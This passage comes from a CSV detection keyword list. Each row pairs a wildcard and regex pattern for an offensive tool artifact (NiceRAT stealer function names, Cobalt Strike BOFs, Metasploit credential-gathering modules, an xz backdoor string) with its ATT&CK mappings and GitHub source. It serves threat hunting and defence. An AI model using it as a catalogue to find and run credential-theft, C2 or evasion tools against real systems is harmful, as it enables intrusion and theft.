T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1336","207","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" "*fuse_evil.*",".{0,1000}fuse_evil\..{0,1000}","offensive_tool_keyword","POC","Exploit for CVE-2022-27666","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tools","https://github.com/plummm/CVE-2022-27666","1","1","N/A","N/A","3","203","44","2022-03-28T18:21:00Z","2022-03-23T22:54:28Z" "*fuse_lowlevel.h*",".{0,1000}fuse_lowlevel\.h.{0,1000}","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","4","363","58","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z" "*fuxploider --url * --not-regex ""wrong file type""*",".{0,1000}fuxploider\s\-\-url\s.{0,1000}\s\-\-not\-regex\s\""wrong\sfile\stype\"".{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*fuxploider*",".{0,1000}fuxploider.{0,1000}","offensive_tool_keyword","fuxploider","Fuxploider is an open source penetration testing tool that automates the process of detecting and exploiting file upload forms flaws. This tool is able to detect the file types allowed to be uploaded and is able to detect which technique will work best to upload web shells or any malicious file on the desired web server.","T1526 - T1505 - T1506 - T1574","TA0006 - TA0008","N/A","N/A","Web Attacks","https://github.com/almandin/fuxploider","1","0","N/A","N/A","10","2950","492","2023-04-16T19:57:12Z","2017-07-14T09:30:06Z" "*fuzz_option.pl*",".{0,1000}fuzz_option\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*fuzzdb*",".{0,1000}fuzzdb.{0,1000}","offensive_tool_keyword","fuzzdb","FuzzDB was created to increase the likelihood of finding application security vulnerabilities through dynamic application security testing. Its the first and most comprehensive open dictionary of fault injection patterns. predictable resource locations. and regex for matching server responses.","T1190 - T1191 - T1192 - T1193 - T1197","TA0002 - TA0008","N/A","N/A","Web Attacks","https://github.com/fuzzdb-project/fuzzdb","1","0","N/A","N/A","10","7960","2074","2023-11-10T16:15:18Z","2015-09-10T17:54:31Z" "*fuzzers/rippackets.pl*",".{0,1000}fuzzers\/rippackets\.pl.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","1","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*fuzzfactory.py*",".{0,1000}fuzzfactory\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*fuzzrequest.py*",".{0,1000}fuzzrequest\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*FuzzySecurity/Dendrobate*",".{0,1000}FuzzySecurity\/Dendrobate.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*FuzzySecurity/Sharp-Suite*",".{0,1000}FuzzySecurity\/Sharp\-Suite.{0,1000}","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*FuzzySecurity/StandIn*",".{0,1000}FuzzySecurity\/StandIn.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","1","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*fw_walk disable*",".{0,1000}fw_walk\sdisable.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","0","N/A","10","10","99","14","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" "*g_hDesk = Funcs::pOpenDesktopA(g_desktopName*",".{0,1000}g_hDesk\s\=\sFuncs\:\:pOpenDesktopA\(g_desktopName.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*g_hookedSleep.*",".{0,1000}g_hookedSleep\..{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","845","147","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" "*g0h4n/RDE1*",".{0,1000}g0h4n\/RDE1.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","1","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*g0h4n/REC2*",".{0,1000}g0h4n\/REC2.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*G0ldenGunSec/GetWebDAVStatus*",".{0,1000}G0ldenGunSec\/GetWebDAVStatus.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","104","26","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z" "*G0ldenGunSec/SharpSecDump*",".{0,1000}G0ldenGunSec\/SharpSecDump.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","N/A","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","1","N/A","10","6","558","73","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z" "*g0tmi1k*",".{0,1000}g0tmi1k.{0,1000}","offensive_tool_keyword","Github Username","Github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/g0tmi1k","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*G1Q+4a0TgAHnlq2B8BKLZUP6wDHsjX6F5nVtUTU3dBQ*",".{0,1000}G1Q\+4a0TgAHnlq2B8BKLZUP6wDHsjX6F5nVtUTU3dBQ.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","https://www.wiz.io/blog/cve-2024-3094-critical-rce-vulnerability-found-in-xz-utils#latest-wiz-research-findings-as-of-april-3-2024-33","10","10","N/A","N/A","N/A","N/A" "*G374U70F111(*",".{0,1000}G374U70F111\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*G3770K3N(*",".{0,1000}G3770K3N\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*G3770K3N1NF0(*",".{0,1000}G3770K3N1NF0\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*G37800KM4rK5(*",".{0,1000}G37800KM4rK5\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*G3781111N6(*",".{0,1000}G3781111N6\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*G3784D63(*",".{0,1000}G3784D63\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*G378r0W53r5(br0W53rP47H5)*",".{0,1000}G378r0W53r5\(br0W53rP47H5\).{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*G37C00K13(*",".{0,1000}G37C00K13\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*G37C0D35(*",".{0,1000}G37C0D35\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*G37CC5(*",".{0,1000}G37CC5\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*G37D15C0rD(*",".{0,1000}G37D15C0rD\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*G37D474(*",".{0,1000}G37D474\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*G37H1570rY(*",".{0,1000}G37H1570rY\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*G37P455W(*",".{0,1000}G37P455W\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*G37UHQ6U11D5(*",".{0,1000}G37UHQ6U11D5\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*G37UHQFr13ND5(*",".{0,1000}G37UHQFr13ND5\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*G37W3851735(*",".{0,1000}G37W3851735\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*g3tsyst3m/undertheradar*",".{0,1000}g3tsyst3m\/undertheradar.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","1","N/A","9","1","10","1","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z" "*G47H3rZ1P5(*",".{0,1000}G47H3rZ1P5\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*gabriellandau/PPLFault*",".{0,1000}gabriellandau\/PPLFault.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*GadgetToJScript.csproj*",".{0,1000}GadgetToJScript\.csproj.{0,1000}","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","10","9","827","154","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" "*GadgetToJScript.exe -a *",".{0,1000}GadgetToJScript\.exe\s\-a\s.{0,1000}","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless Lateral Movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","0","N/A","10","10","321","46","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" "*GadgetToJScript.sln*",".{0,1000}GadgetToJScript\.sln.{0,1000}","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","10","9","827","154","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" "*GadgetToJScript-master*",".{0,1000}GadgetToJScript\-master.{0,1000}","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","10","9","827","154","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" "*Gality369/CS-Loader*",".{0,1000}Gality369\/CS\-Loader.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","786","145","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" "*GateTrampolin.asm*",".{0,1000}GateTrampolin\.asm.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","260","42","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" "*gateway-finder*",".{0,1000}gateway\-finder.{0,1000}","offensive_tool_keyword","gateway-finder-imp","This is an improved version of original Gateway-finder. New version rebuilt with python3 and support for files with MACs/IPs The homepage of original project is: http://pentestmonkey.net/tools/gateway-finder Gateway-finder is a scapy script that will help you determine which of the systems on the local LAN has IP forwarding enabled and which can reach the Internet.","T1016 - T1049 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Data Exfiltration","https://github.com/whitel1st/gateway-finder-imp","1","0","N/A","N/A","1","60","7","2024-01-28T17:04:10Z","2018-04-18T12:43:11Z" "*gather/credentials/rdc_manager_creds*",".{0,1000}gather\/credentials\/rdc_manager_creds.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*gather/credentials/teamviewer_passwords*",".{0,1000}gather\/credentials\/teamviewer_passwords.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*gather/credentials/windows_autologin*",".{0,1000}gather\/credentials\/windows_autologin.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*gather/enum_ad_bitlocker*",".{0,1000}gather\/enum_ad_bitlocker.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*gather/enum_ad_computers*",".{0,1000}gather\/enum_ad_computers.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*gather/enum_ad_groups*",".{0,1000}gather\/enum_ad_groups.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*gather/enum_ad_managedby_groups*",".{0,1000}gather\/enum_ad_managedby_groups.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 